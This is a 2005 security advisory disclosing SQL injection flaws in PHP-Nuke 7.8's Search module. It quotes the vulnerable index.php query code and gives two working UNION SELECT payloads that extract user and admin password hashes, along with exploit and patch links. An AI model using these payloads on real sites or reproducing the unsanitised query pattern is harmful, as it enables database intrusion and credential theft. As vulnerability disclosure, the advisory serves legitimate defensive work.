-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SecurityAlert SA027 Author: sp3x GPG: http://securityreason.com/key/sp3x.gpg Date: 15. November 2005 Affected software : =================== PHPNuke version : 7.8 with all security fixes/patches Not Affected software : ======================= PHPNuke version : 7.9 + patch 3.1 Description : ============= PHP-Nuke is a Web Portal System, storytelling software, News system, online community or whatever you want to call it. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles, just similar to Slashdot and many others. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web server, PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). Support for 25 languages, Yahoo like search engine, Comments option in Polls, lot of themes, Ephemerids manager, File Manager, Headlines, download manager, faq manager, advanced blocks systems, reviews system, newsletter, categorized articles, multilanguage content management, phpBB Forums included and a lot more. Vulnerabilities : ***************** Critical SQL injection : ========================== IN module called "Search" there exists SQL Injection bug, which can lead to stealing admin`s username and password md5 and also some sensitive data from database. The problem exist in index.php so first let's see the source code of this file. Original code from index.php : - --------------------------------- ... $query = stripslashes(check_html($query, "nohtml")); if ($type=="stories" OR !$type) { if ($category > 0) { $categ = "AND catid='$category' "; } else { $categ = ""; } $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a where s.aid=a.aid $queryalang $categ"; if (isset($query)) $q .= "AND (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes LIKE '%$query%') "; if (!empty($author)) $q .= "AND s.aid='$author' "; if (!empty($topic)) $q .= "AND s.topic='$topic' "; if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' "; $q .= " ORDER BY s.time DESC LIMIT $min,$offset"; $t = $topic; $result5 = $db->sql_query($q); $nrows = $db->sql_numrows($result5); .... - ----------------------------------- Here we can see that there is stripslashes() used on $query variable . Using stripslashes(); before mysql statment lead to critical Sql Injection attack. This Sql Injection will work in every type of Search . Here i mean : type=="stories" type=="comments" type=="reviews" type=="users" And also will work when is_active("Downloads") , is_active("Web_Links") or is_active("Encyclopedia"). So we have here about 7 Critical SQL injections. Exploit test : - -------------- Enter this into Search field : s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> users passwords and logins s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors passwords and logins Exploit : - --------- http://securityreason.com/achievement_exploitalert/5 How to fix : ============ Download the new version of the script or update. http://securityreason.com/patch/6 Greets : ======== Special greets : cXIb8O3 , pkw, pi3, p_e_a and others . Contact : ========= sp3x[at]securityreason[dot].com www.securityreason.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.7 (GNU/Linux) iD8DBQFDedrRhaZ93YsJSwQRArwUAKCaSKtt8nqY66P3xazISfls+1VfoACglrMU yDQ955aOQpjnDMqXPvClE/I= =+sx9 -----END PGP SIGNATURE-----